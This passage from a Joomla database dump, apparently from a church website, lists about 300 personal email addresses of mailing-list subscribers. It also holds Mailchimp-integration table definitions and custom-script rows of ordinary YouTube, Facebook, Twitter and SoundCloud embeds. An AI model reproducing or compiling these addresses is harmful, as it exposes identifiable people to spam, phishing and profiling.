(374, 0, 'lanjiki@gmail.com', 'cb9600c42e'),
(375, 0, 'Odeyemitayo@gmail.com', 'cb9600c42e'),
(376, 0, 'Modupakin@yahoo.com', 'cb9600c42e'),
(377, 0, 'Vivmonicsm851@gmail.com', 'cb9600c42e'),
(378, 0, 'yawedorothy360@gmail.com', 'cb9600c42e'),
(379, 0, 'dorothyyawe6@gmail.com', 'cb9600c42e'),
(380, 0, 'dralafem11@gmail.com', 'cb9600c42e'),
(381, 0, 'giftebuno87@gmail.com', 'cb9600c42e'),
(382, 0, 'mbadams44@netzero.net', 'cb9600c42e'),
(383, 0, 'Pastormikeokachi@yahoo.com', 'cb9600c42e'),
(384, 0, 'vetniniaj@gmail.com', 'cb9600c42e'),
(385, 0, 'isolatimileyin@yahoo.com', 'cb9600c42e'),
(386, 0, 'chinonphil4@gmail.com', 'cb9600c42e'),
(387, 0, 'olabanjosanni@gmail.com', 'cb9600c42e'),
(388, 0, 'aafolabi991@gmail.com', 'cb9600c42e'),
(389, 0, 'ayorindekomolafe@yahoo.com', 'cb9600c42e'),
(390, 0, 'dipoomope@gmail.com', 'cb9600c42e'),
(391, 0, 'ademola.adedayo2000@gmail.com', 'cb9600c42e'),
(392, 0, 'edegbo7@gmail.com', 'cb9600c42e'),
(393, 0, 'Bunmioyinloye@ymail.com', 'cb9600c42e'),
(394, 0, 'etimelizabeth41@gmail.com', 'cb9600c42e'),
(395, 0, 'aoonasanya@yahoo.com', 'cb9600c42e'),
(396, 0, 'adepejuoye2008@yahoo.com', 'cb9600c42e'),
(397, 0, 'adedeji.ogunleyejohnson@gmail.com', 'cb9600c42e'),
(398, 0, 'gbemi_oladoz@yahoo.com', 'cb9600c42e'),
(399, 0, 'bislaw2006@yahoo.com', 'cb9600c42e'),
(400, 0, 'adulojubaba@yahoo.com', 'cb9600c42e'),
(401, 0, 'babadakun529@gmail.com', 'cb9600c42e'),
(402, 0, 'Sope2beat@gmail.com', 'cb9600c42e'),
(403, 0, 'oderindeolufisayo@gmail.com', 'cb9600c42e'),
(404, 0, 'ogundipeoluwagbenga6@gmail.com', 'cb9600c42e'),
(405, 0, 'Jesulanasamson@gmail.com', 'cb9600c42e'),
(406, 0, 'jummyplus@yahoo.com', 'cb9600c42e'),
(407, 0, 'hezekiah1sanmi@gmail.com', 'cb9600c42e'),
(408, 0, 'fayewoh1@gmail.com', 'cb9600c42e'),
(409, 0, 'hannatupilasar@yahoo.com', 'cb9600c42e'),
(410, 0, 'haryorphemy@gmail.com', 'cb9600c42e'),
(411, 0, 'oluwafemiogunniyi@gmail.com', 'cb9600c42e'),
(412, 0, 'Strawcode@gmail.Com', 'cb9600c42e'),
(413, 0, 'josephgoodluck93@gmail.com', 'cb9600c42e'),
(414, 0, 'adenirantoun1@gmail.com', 'cb9600c42e'),
(415, 0, 'bogsun2001@yahoo.com', 'cb9600c42e'),
(416, 0, 'abayomi.adegun@yahoo.com', 'cb9600c42e'),
(417, 0, 'pero4christ@gmail.com', 'cb9600c42e'),
(418, 0, 'findcy@yahoo.com', 'cb9600c42e'),
(419, 0, 'favour_mercy2011@yahoo.com', 'cb9600c42e'),
(420, 0, 'elizabethomolale@gmail.com', 'cb9600c42e'),
(421, 0, 'kolapoglory3@gmail.com', 'cb9600c42e'),
(422, 0, 'Nanchuatfaden@Gmail.com', 'cb9600c42e'),
(423, 0, 'tosinenoh@gmail.com', 'cb9600c42e'),
(424, 0, 'adefunkesanni@gmail.com', 'cb9600c42e'),
(425, 0, 'feelhimnow@yahoo.com', 'cb9600c42e'),
(426, 0, 'taiwopeajayi@yahoo.com', 'cb9600c42e'),
(427, 0, 'Tomison26@yahoo.com', 'cb9600c42e'),
(428, 0, 'abiola_akd007@yahoo.co.uk', 'cb9600c42e'),
(429, 0, 'adeniyiogunnusi@gmail.com', 'cb9600c42e'),
(430, 0, 'apostlejeremiah.watersfamily@gmail.com', 'cb9600c42e'),
(431, 0, 'agbarakristi@gmail.com', 'cb9600c42e'),
(432, 0, 'jyzayzay2015@gmail.com', 'cb9600c42e'),
(433, 0, 'blestim16@gmail.com', 'cb9600c42e'),
(434, 0, 'Adeshina5674@gmail.com', 'cb9600c42e'),
(435, 0, 'Okunyegbenga293@gmail.com', 'cb9600c42e'),
(436, 0, 'oyemayokun1z@gmail.com', 'cb9600c42e'),
(437, 0, 'kunleadesanwo@gmail.com', 'cb9600c42e'),
(438, 0, 'ayoolaadediran39@yahoo.com', 'cb9600c42e'),
(439, 0, 'oniblessing93@gmail.com', 'cb9600c42e'),
(440, 0, 'stainless011@gmail.com', 'cb9600c42e'),
(441, 0, 'Nifemi5171@gmail.com', 'cb9600c42e'),
(442, 0, 'abiodunessiet@gmail.com', 'cb9600c42e'),
(443, 0, 'blessedtitus@gmail.com', 'cb9600c42e'),
(444, 0, 'iffymama020@gmail.com', 'cb9600c42e'),
(445, 0, 'ogunwoleebenezer@gmail.com', 'cb9600c42e'),
(446, 0, 'adebolabiodun@gmail.com', 'cb9600c42e'),
(447, 0, 'pitaflowpet@yahoo.com', 'cb9600c42e'),
(448, 0, 'iyi.kolade@yahoo.com', 'cb9600c42e'),
(449, 0, 'beyiokub@gmail.com', 'cb9600c42e'),
(450, 0, 'otobofrncis@gmail.com', 'cb9600c42e'),
(451, 0, 'tomisindare@yahoo.com', 'cb9600c42e'),
(452, 0, 'olaoluwaolawoye2309@gmail.com', 'cb9600c42e'),
(453, 0, 'jolaade.janet@yahoo.com', 'cb9600c42e'),
(454, 0, 'solabis067@gmail.com', 'cb9600c42e'),
(455, 0, 'atandaseun@yahoo.com', 'cb9600c42e'),
(456, 0, 'oluwoleadeolu53@gmail.com', 'cb9600c42e'),
(457, 0, 'olaadeayeni@gmail.com', 'cb9600c42e'),
(458, 0, 'titilope2k11@gmail.com', 'cb9600c42e'),
(459, 0, 'oluwaseunnoah15@gmail.com', 'cb9600c42e'),
(460, 0, 'emmanuelakinwale@yahoo.com', 'cb9600c42e'),
(461, 0, 'diamond.timothy1@gmail.com', 'cb9600c42e'),
(462, 0, 'jesusbaby.imah@gmail.com', 'cb9600c42e'),
(463, 0, 'okikiadeoyetunde@gmail.com', 'cb9600c42e'),
(464, 0, 'gizeiyamu@yahoo.com', 'cb9600c42e'),
(465, 0, 'falbookshop@gmail.com', 'cb9600c42e'),
(466, 0, 'Wolelarjeeday@gmail.com', 'cb9600c42e'),
(467, 0, 'titohrr9@gmail.com', 'cb9600c42e'),
(468, 0, 'darryetty@yahoo.ca', 'cb9600c42e'),
(469, 0, 'obazeowen@yahoo.com', 'cb9600c42e'),
(470, 0, 'awoyemiko@gmail.com', 'cb9600c42e'),
(471, 0, 'Seun2512@yahoo.com', 'cb9600c42e'),
(472, 0, 'Funkesode@yahoo.com', 'cb9600c42e'),
(473, 0, 'adelizzy13@gmail.ccom', 'cb9600c42e'),
(474, 0, 'peterdrock2012@yahoo.com', 'cb9600c42e'),
(475, 0, 'emmanuelosungbure@gmail.com', 'cb9600c42e'),
(476, 0, 'debbiakinlabi@gmail.com', 'cb9600c42e'),
(477, 0, 'tobaoye@gmail.com', 'cb9600c42e'),
(478, 0, 'emmanueljokotola@yahoo.com', 'cb9600c42e'),
(479, 0, 'dejispot@gmail.com', 'cb9600c42e'),
(480, 0, 'Uzomac2017@mail.com', 'cb9600c42e'),
(481, 0, 'Favouradeola@gmail.com', 'cb9600c42e'),
(482, 0, 'chiomagodwinopara@gmail.com', 'cb9600c42e'),
(483, 0, 'bodebankole3@gmail.com', 'cb9600c42e'),
(484, 0, 'dinniwilliams@gmail.com', 'cb9600c42e'),
(485, 0, 'peter2002ab@yahoo.co.uk', 'cb9600c42e'),
(486, 0, 'emma.bambo@yahoo.com', 'cb9600c42e'),
(487, 0, 'Yinkajaneoye@gmail.com', 'cb9600c42e'),
(488, 0, 'oyebayo.sunday@gmail.com', 'cb9600c42e'),
(489, 0, 'babatundejohnoluwadamilare@gmail.com', 'cb9600c42e'),
(490, 0, 'iakhalu@yahoo.com', 'cb9600c42e'),
(491, 0, 'omololaonamusi@gmail.com', 'cb9600c42e'),
(492, 0, 'okonkwobarbara@yahoo.com', 'cb9600c42e'),
(493, 0, 'kingroyalpalace@gmail.com', 'cb9600c42e'),
(494, 0, 'samueleshemokhai@gmail.com', 'cb9600c42e'),
(495, 0, 'yomiadewuyi@gmail.com', 'cb9600c42e'),
(496, 0, 'esienanwanonline@gmail.com', 'cb9600c42e'),
(497, 0, 'solution_consult@yahoo.com', 'cb9600c42e'),
(498, 0, 'babalolawilliams13@gmail.com', 'cb9600c42e'),
(499, 0, 'epaphras4wonder@gmail.com', 'cb9600c42e'),
(500, 0, 'ayodeleemmanuel06@gmail.com', 'cb9600c42e'),
(501, 0, 'Chrisfadero@googlemail.com', 'cb9600c42e'),
(502, 0, 'tunixlag2@gmail.com', 'cb9600c42e'),
(503, 0, 'Jayeolajubril122@gmail.com', 'cb9600c42e'),
(504, 0, 'achievershall@gmail.com', 'cb9600c42e'),
(505, 0, 'Olajidesam33@gmail.com', 'cb9600c42e'),
(506, 0, 'opyyco@yahoo.co.uk', 'cb9600c42e'),
(507, 0, 'derojuwale@yahoo.com.au', 'cb9600c42e'),
(508, 0, 'acetise@gmail.com', 'cb9600c42e'),
(509, 0, 'oderindeseun2014@gmail.com', 'cb9600c42e'),
(510, 0, 'bola.agbaje@gmail.com', 'cb9600c42e'),
(511, 0, 'bolar.agbaje@gmail.com', 'cb9600c42e'),
(512, 0, 'kingdavidabiona@gmail.com', 'cb9600c42e'),
(513, 0, 'ajosehseun9454@gmail.com', 'cb9600c42e'),
(514, 0, 'Olabiola2@yahoo.com', 'cb9600c42e'),
(515, 0, 'dolyblues@gmail.com', 'cb9600c42e'),
(516, 0, 'felumu@yahoo.com', 'cb9600c42e'),
(517, 0, 'prophet.davidadeyileka@yahoo.com', 'cb9600c42e'),
(518, 0, 'patrizzy75@gmail.com', 'cb9600c42e'),
(519, 0, 'benjaminkayode2018@gmail.com', 'cb9600c42e'),
(520, 0, 'jamiu_suleiman@Yahoo.com', 'cb9600c42e'),
(521, 0, 'kingisaac11@gmail.com', 'cb9600c42e'),
(522, 0, 'owolabijohnib@gmail.com', 'cb9600c42e'),
(523, 0, 'Segunoyewole40@gmail.com', 'cb9600c42e'),
(524, 0, 'omowumi.opeoluwa@gmail.com', 'cb9600c42e'),
(525, 0, 'eligbenga2016@gmail.com', 'cb9600c42e'),
(526, 0, 'aderetiadefunke001@gmail.com', 'cb9600c42e'),
(527, 0, 'adex1177@gmail.com', 'cb9600c42e'),
(528, 0, 'cletusdeunifier@gmail.com', 'cb9600c42e'),
(529, 0, 'abiodunsulaiman694@gmail.com', 'cb9600c42e'),
(530, 0, 'oluabiola2@yahoo.com', 'cb9600c42e'),
(531, 0, 'avesloan@gmail.com', 'cb9600c42e'),
(532, 0, 'soadewoye@oauife.edu.ng', 'cb9600c42e'),
(533, 0, 'tanidabi@gmail.com', 'cb9600c42e'),
(534, 0, 'hussainimailbox@yahoo.com', 'cb9600c42e'),
(535, 0, 'ajibolaolayinka@gmail.com', 'cb9600c42e'),
(536, 0, 'seun251288@gmail.com', 'cb9600c42e'),
(537, 0, 'mmbui4@yahoo.com', 'cb9600c42e'),
(538, 0, 'asaolupaul@gmail.com', 'cb9600c42e'),
(539, 0, 'bamisegun@gmail.com', 'cb9600c42e'),
(540, 0, 'asaolupaul@yahoo.com', 'cb9600c42e'),
(541, 0, 'johnsonsunday2@yahoo.com', 'cb9600c42e'),
(542, 0, 'omoniyiraphael@yahoo.com', 'cb9600c42e'),
(543, 0, 'Xtecera@gmail.com', 'cb9600c42e'),
(544, 0, 'adex2kg@yahoo.com', 'cb9600c42e'),
(545, 0, 'jenitibeh@gmail.com', 'cb9600c42e'),
(546, 0, 'emichuks1@yahoo.com', 'cb9600c42e'),
(547, 0, 'joechuks247@gmail.com', 'cb9600c42e'),
(548, 0, 'chirambolusungu@gmail.com', 'cb9600c42e'),
(549, 0, 'Blisszitunu21@gmail.com', 'cb9600c42e'),
(550, 0, 'solomon77@protonmail.com', 'cb9600c42e'),
(551, 0, 'temitope.gloria@hotmail.com', 'cb9600c42e'),
(552, 0, 'iyandaadebayo5@gmail.com', 'cb9600c42e'),
(553, 0, 'revolusola@gmail.com', 'cb9600c42e'),
(554, 0, 'brightidiado@gmail.com', 'cb9600c42e'),
(555, 0, 'durojayeoluwagbenga1@gmail.com', 'cb9600c42e'),
(556, 0, 'ajadiezekiel02@gmail.com', 'cb9600c42e'),
(557, 0, 'kolawoleolukare1@gmail.com', 'cb9600c42e'),
(558, 0, 'Comforrmi0415@gmail.com', 'cb9600c42e'),
(559, 0, 'Fidelisogonna72@gmail.com', 'cb9600c42e'),
(560, 0, 'jesuribigbe@gmail.com', 'cb9600c42e'),
(561, 0, 'oladipofayemiwo@gmail.com', 'cb9600c42e'),
(562, 0, 'mohammedphilips1@gmail.com', 'cb9600c42e'),
(563, 0, 'acceptabless@gmail.com', 'cb9600c42e'),
(564, 0, 'ooakinruli@hotmail.com', 'cb9600c42e'),
(565, 0, 'tope.sokun@gmail.com', 'cb9600c42e'),
(566, 0, 'appahtompson@yahoo.com', 'cb9600c42e'),
(567, 0, 'oyinprebi_m@yahoo.com', 'cb9600c42e'),
(568, 0, 'Ayomideifeoluwaa555@gmail.com', 'cb9600c42e'),
(569, 0, 'adewoyepaula@gmail.com', 'cb9600c42e'),
(570, 0, 'asehondee@gmail.com', 'cb9600c42e'),
(571, 0, 'Covenantharry2@gmail.com', 'cb9600c42e'),
(572, 0, 'victorusikalu@gmail.com', 'cb9600c42e'),
(573, 0, 'ostaveley@yahoo.com', 'cb9600c42e'),
(574, 0, 'doubletwinsj@yahoo.com', 'cb9600c42e'),
(575, 0, 'banjiadewoye@gmail.com', 'cb9600c42e'),
(576, 0, 'debofagbemi@yahoo.com', 'cb9600c42e'),
(577, 0, 'anaryaafaliaishatu@yahoo.com', 'cb9600c42e'),
(578, 0, 'oluwaseunolomofe@hotmail.com', 'cb9600c42e'),
(579, 0, 'maudlinedavies@yahoo.com', 'cb9600c42e'),
(580, 0, 'adewoleisrael005@gmail.com', 'cb9600c42e'),
(581, 0, 'oolufemikolawole@yahoo.com', 'cb9600c42e'),
(582, 0, 'Labisiadekunle@gmail.com', 'cb9600c42e'),
(583, 0, 'olusayoogun@yahoo.com', 'cb9600c42e'),
(584, 0, 'oluwadamilolaoladele17@gmail.com', 'cb9600c42e'),
(585, 0, 'tobiayoloto@gmail.com', 'cb9600c42e'),
(586, 0, 'bundemarkpeters@gmail.com', 'cb9600c42e'),
(587, 0, 'debbiecounting@yahoo.com', 'cb9600c42e'),
(588, 0, 'gemmaroach141@gail.com', 'cb9600c42e'),
(589, 0, 'erhiesibiyeye@gmail.com', 'cb9600c42e'),
(590, 0, 'peteradekunle99@gmail.com', 'cb9600c42e'),
(591, 0, 'revamosbockarie@gmail.com', 'cb9600c42e'),
(592, 0, 'oyedepodorcas123@gmail.com', 'cb9600c42e'),
(593, 0, 'dyyemosteven@gmail.com', 'cb9600c42e'),
(594, 0, 'gadimohemmanuel002@gmail.com', 'cb9600c42e'),
(595, 0, 'gojuolape@yahoo.com', 'cb9600c42e'),
(596, 0, 'Jubeedayo@gmail.com', 'cb9600c42e'),
(597, 0, 'olowoyoifeoluwa@gmail.com', 'cb9600c42e'),
(598, 0, 'funmirice@yahoo.com', 'cb9600c42e'),
(599, 0, 'babatundetemitope21@gmail.com', 'cb9600c42e'),
(600, 0, 'b.adi@frsc.gov.ng', 'cb9600c42e'),
(601, 0, 'mattewozil@gmail.com', 'cb9600c42e'),
(602, 0, 'ddave099@gmail.com', 'cb9600c42e'),
(603, 0, 'tfagbs77@gmail.con', 'cb9600c42e'),
(604, 0, 'paciseya@yahoo.com', 'cb9600c42e'),
(605, 0, 'paciseya@gmail.com', 'cb9600c42e'),
(606, 0, 'penthousemine@gmail.com', 'cb9600c42e'),
(607, 0, 'alimiadewale68@gmail.com', 'cb9600c42e'),
(608, 0, 'homamenum@yahoo.com', 'cb9600c42e'),
(609, 0, 'Adeomo@hotmail.com', 'cb9600c42e'),
(610, 0, 'olasunkanmiholuwhasheun@gmail.com', 'cb9600c42e'),
(611, 0, 'owoyelerufusb@gmail.com', 'cb9600c42e'),
(612, 0, 'josepholaoluwa84@gmail.com', 'cb9600c42e'),
(613, 0, 'temiladeabimbola46@gmail.com', 'cb9600c42e'),
(614, 0, 'oladsam1215@gmail.com', 'cb9600c42e'),
(615, 0, 'chin1324@hotmail.com', 'cb9600c42e'),
(616, 0, 'Swtyjmrswty@gmail.com', 'cb9600c42e'),
(617, 0, 'Sarakutil@gmail.com', 'cb9600c42e'),
(618, 0, 'Ebunola09@yahoo.com', 'cb9600c42e'),
(619, 0, 'Sweetyife@gmail.com', 'cb9600c42e'),
(620, 0, 'adegbayeola@gmail.com', 'cb9600c42e'),
(621, 0, 'sewaowoeye@gmail.com', 'cb9600c42e'),
(622, 0, 'niyisade2014@gmail.com', 'cb9600c42e'),
(623, 0, 'ogunbiyikayode5@gmail.com', 'cb9600c42e'),
(624, 0, 'godliness39@yahoo.com', 'cb9600c42e'),
(625, 0, 'Olutoby@gmail.com', 'cb9600c42e'),
(626, 0, 'ikechukwujosephf@gmail.com', 'cb9600c42e'),
(627, 0, 'samsgiftt1@gmail.com', 'cb9600c42e'),
(628, 0, 'topasconsult@gmail.com', 'cb9600c42e'),
(629, 0, 'odebiyihabeeb@gmail.com', 'cb9600c42e'),
(630, 0, 'taiwo1458@yahoo.com', 'cb9600c42e'),
(631, 0, 'lekan.atilola@gmail.com', 'cb9600c42e'),
(632, 0, 'ascentsolutionsng@gmail.com', 'cb9600c42e'),
(633, 0, 'okenwahinazojoy@yahoo.com', 'cb9600c42e'),
(634, 0, 'doctornator22@gmail.com', 'cb9600c42e'),
(635, 0, 'orheridley@gmail.com', 'cb9600c42e'),
(636, 0, 'ayoadef@yahoo.com', 'cb9600c42e'),
(637, 0, 'epidmos@gmail.com', 'cb9600c42e'),
(638, 0, 'sogreat888@yahoo.com', 'cb9600c42e'),
(639, 0, 'ejikejoshua59@gmail.com', 'cb9600c42e'),
(640, 0, 'martinsakerele@gmail.com', 'cb9600c42e'),
(641, 0, 'dolapss@yahoo.com', 'cb9600c42e'),
(642, 0, 'aremite15@gmail.com', 'cb9600c42e'),
(643, 0, 'kunleadeyemi1@gmail.com', 'cb9600c42e'),
(644, 0, 'olukosisamuel@gmail.com', 'cb9600c42e'),
(645, 0, 'bolatiwaolokede@gmail.com', 'cb9600c42e'),
(646, 0, 'Oluwasayosamson43@gmail.com', 'cb9600c42e'),
(647, 0, 'taiyeojay@gmail.com', 'cb9600c42e'),
(648, 0, 'mahsylvie@gmail.com', 'cb9600c42e'),
(649, 0, 'mojisolaclarajacob@gmail.com', 'cb9600c42e'),
(650, 0, 'ujmadonna4biz@yahoo.com', 'cb9600c42e'),
(651, 0, 'Habeeb.o.odebiyi@gmail.com', 'cb9600c42e'),
(652, 0, 'olamii07@gmail.com', 'cb9600c42e'),
(653, 0, 'oladoyinayooluwa@gmail.com', 'cb9600c42e'),
(654, 0, 'svenskahistorien@gmail.com', 'cb9600c42e'),
(655, 0, 'fodus4dking@gmail.com', 'cb9600c42e'),
(656, 0, 'foladoye06@yahoo.com', 'cb9600c42e'),
(657, 0, 'foladoye@yahoo.com', 'cb9600c42e'),
(658, 0, 'adeagbooj@gmail.com', 'cb9600c42e'),
(659, 0, 'Johnsonademola@yahoo.com', 'cb9600c42e'),
(660, 0, 'www.akanni4christ@gmail.com', 'cb9600c42e'),
(661, 0, 'akanni4christ@gmail.com', 'cb9600c42e'),
(662, 0, 'tkalaskina@yahoo.com', 'cb9600c42e'),
(663, 0, 'ikeijefredrick@gmail.com', 'cb9600c42e'),
(664, 0, 'ayotiti@gmail.com', 'cb9600c42e'),
(665, 0, 'oluwatosin.adelowo@gmail.com', 'cb9600c42e'),
(666, 0, 'eluyeram4success2@gmail.co', 'cb9600c42e'),
(667, 0, 'eluyeram4success2@gmail.com', 'cb9600c42e'),
(668, 0, 'Omosioniokoro@gmail.com', 'cb9600c42e'),
(669, 0, 'jesutomisin504@gmail.com', 'cb9600c42e'),
(670, 0, 'oladeleseun403@gmail.com', 'cb9600c42e'),
(671, 0, 'detola2005@yahoo.com', 'cb9600c42e'),
(672, 0, 'Adesolasolution@gmail.com', 'cb9600c42e'),
(673, 0, 'Isaacezekiel4@gmail.com', 'cb9600c42e'),
(674, 0, 'laolusuccess02@gmail.com', 'cb9600c42e'),
(675, 0, 'akintolaoluwasegun68@gmail.com', 'cb9600c42e'),
(676, 0, 'Daviddaniel4christ@yahoo.com', 'cb9600c42e'),
(677, 0, 'amynick2010@yahoo.com', 'cb9600c42e'),
(678, 0, 'sleanies@yahoo.com', 'cb9600c42e');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration_campaigns`
--

CREATE TABLE `y57u5_joomailermailchimpintegration_campaigns` (
  `id` int(11) UNSIGNED NOT NULL,
  `list_id` varchar(25) NOT NULL,
  `list_name` text NOT NULL,
  `name` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `subject` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `from_name` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `from_email` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `reply` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `confirmation` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `creation_date` int(10) UNSIGNED NOT NULL,
  `recipients` int(22) UNSIGNED NOT NULL,
  `sent` tinyint(4) UNSIGNED NOT NULL,
  `cid` varchar(25) NOT NULL,
  `cdata` text NOT NULL,
  `folder_id` int(11) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration_crm`
--

CREATE TABLE `y57u5_joomailermailchimpintegration_crm` (
  `id` int(11) UNSIGNED NOT NULL,
  `crm` varchar(255) NOT NULL,
  `params` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration_crm_users`
--

CREATE TABLE `y57u5_joomailermailchimpintegration_crm_users` (
  `id` int(11) UNSIGNED NOT NULL,
  `crm` varchar(20) NOT NULL,
  `user_id` int(11) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration_custom_fields`
--

CREATE TABLE `y57u5_joomailermailchimpintegration_custom_fields` (
  `id` int(11) UNSIGNED NOT NULL,
  `listID` varchar(25) NOT NULL,
  `name` varchar(255) NOT NULL,
  `framework` varchar(10) NOT NULL DEFAULT '',
  `dbfield` varchar(255) NOT NULL DEFAULT '',
  `grouping_id` varchar(25) NOT NULL DEFAULT '',
  `type` varchar(5) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration_misc`
--

CREATE TABLE `y57u5_joomailermailchimpintegration_misc` (
  `id` int(11) UNSIGNED NOT NULL,
  `listid` varchar(25) NOT NULL,
  `type` varchar(50) NOT NULL,
  `value` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration_signup`
--

CREATE TABLE `y57u5_joomailermailchimpintegration_signup` (
  `id` int(11) UNSIGNED NOT NULL,
  `fname` varchar(100) DEFAULT NULL,
  `lname` varchar(100) DEFAULT NULL,
  `email` varchar(100) NOT NULL,
  `groupings` text NOT NULL,
  `merges` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jumi`
--

CREATE TABLE `y57u5_jumi` (
  `id` int(11) UNSIGNED NOT NULL,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `path` varchar(255) DEFAULT NULL,
  `custom_script` text,
  `access` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `published` int(11) NOT NULL DEFAULT '1'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jumi`
--

INSERT INTO `y57u5_jumi` (`id`, `title`, `alias`, `path`, `custom_script`, `access`, `checked_out`, `published`) VALUES
(1, 'Youtube Live Streaming', '', '', '<iframe width=\"640\" height=\"360\" src=\"https://www.youtube.com/embed/wxkmVSA4ZYU?rel=0\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>', 0, 0, 1),
(12, 'Broadcast Schedule', 'broadcast_schedule', '', '<iframe width=\"1200\" height=\"840\" src=\"https://docs.google.com/spreadsheets/d/e/2PACX-1vSoSF_b94Op30m86pyPJAe7O2XsKV2gI-r8ufC8OUvhOeJ6hsOKN0FmYd9az-dJP8DSPBw9bGInnNLs/pubhtml?widget=true&amp;headers=false\"></iframe>', 0, 0, 1),
(3, 'Periscope Live Streaming', '', '', '<a href=\"youtube\"><img src=\"/images/y.png\r\n\" border=\"0\" alt=\"\" style=\"border: 0;\" /></a><a href=\"facebook\"><img src=\"images/f.png\" border=\"0\" alt=\"\" style=\"border: 0;\" /></a><a href=\"periscope\"><img src=\"images/p.png\" border=\"0\" alt=\"\" style=\"border: 0;\" /></a><a href=\"http://dciradio.org\" target =\"_blank\"><img src=\"images/AUDIO-STREAM.png\" border=\"0\" alt=\"\" width=\"214\" style=\"border: 0;\" /><blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Watch on <a href=\"https://twitter.com/hashtag/Periscope?src=hash\">#Periscope</a>: Super Celebration Service <a href=\"https://t.co/LFAM3Bt0s5\">https://t.co/LFAM3Bt0s5</a></p>&mdash; Rev. Olusola Areogun (@ReverendAreogun) <a href=\"https://twitter.com/ReverendAreogun/status/876390117849665537\">June 18, 2017</a></blockquote>\r\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>', 0, 0, 1),
(4, 'Facebook Live Streaming', '', '', '<a href=\"youtube\"><img src=\"/images/y.png\r\n\" border=\"0\" alt=\"\" style=\"border: 0;\" /></a><a href=\"facebook\"><img src=\"images/f.png\" border=\"0\" alt=\"\" style=\"border: 0;\" /></a><a href=\"periscope\"><img src=\"images/p.png\" border=\"0\" alt=\"\" style=\"border: 0;\" /></a><a href=\"http://dciradio.org\" target =\"_blank\"><img src=\"images/AUDIO-STREAM.png\" border=\"0\" alt=\"\" width=\"214\" style=\"border: 0;\" /><iframe src=\"https://www.facebook.com/plugins/video.php?href=https%3A%2F%2Fwww.facebook.com%2FReverendAreogun%2Fvideos%2F1549575241751608%2F&show_text=0&width=560\" width=\"854\" height=\"560\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\" allowFullScreen=\"true\"></iframe>', 0, 0, 1),
(5, 'Chat', '', '', '<div style=\"height:100%;\"><iframe style=\'overflow:hidden;width:100%;height:400px;\' frameborder=\'0\' border=\'0\' src=\"http://chat.zoho.com/shout.sas?k=%7B%22g%22%3A%22Anonymous%22%2C%22c%22%3A%228a491f0020399b8d672fd225f9663308ac0cb88327550834%22%2C%22o%22%3A%22ca242746529c757c5547739b0c0e4f1d%22%7D&chaturl=DC%20Live%20Stream&V=000000-70a9e1-eff4f9-70a9e1-The%20Dream%20Centre%20Live%20Stream%20Chatroom\"></iframe></div>\r\n\r\n', 0, 0, 1),
(10, 'Private Streaming', '', '', '<iframe width=\"854\" height=\"560\" src=\"https://www.youtube.com/embed/CZUH5fqCz48?rel=0\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>', 0, 0, 1),
(9, 'Facebook Chat', '', '', '<div id=\"fb-root\"></div>\r\n<script>(function(d, s, id) {\r\n  var js, fjs = d.getElementsByTagName(s)[0];\r\n  if (d.getElementById(id)) return;\r\n  js = d.createElement(s); js.id = id;\r\n  js.src = \"//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.6&appId=496223437090509\";\r\n  fjs.parentNode.insertBefore(js, fjs);\r\n}(document, \'script\', \'facebook-jssdk\'));</script>\r\n<div class=\"fb-page\" data-href=\"https://www.facebook.com/DreamCentreLOIC\" data-tabs=\"timeline,messages\" data-small-header=\"false\" data-adapt-container-width=\"true\" data-hide-cover=\"false\" data-show-facepile=\"true\">\r\n    <blockquote cite=\"https://www.facebook.com/DreamCentreLOIC\" class=\"fb-xfbml-parse-ignore\">\r\n        <a href=\"https://www.facebook.com/DreamCentreLOIC\">DC Livestreatming</a>\r\n    </blockquote>\r\n</div>', 0, 0, 1),
(6, 'Podcast', '', '', '<iframe width=\"100%\" height=\"650\" scrolling=\"no\" frameborder=\"no\" src=\"https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/users/189888536&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;visual=true\"></iframe>\r\n', 0, 0, 1),
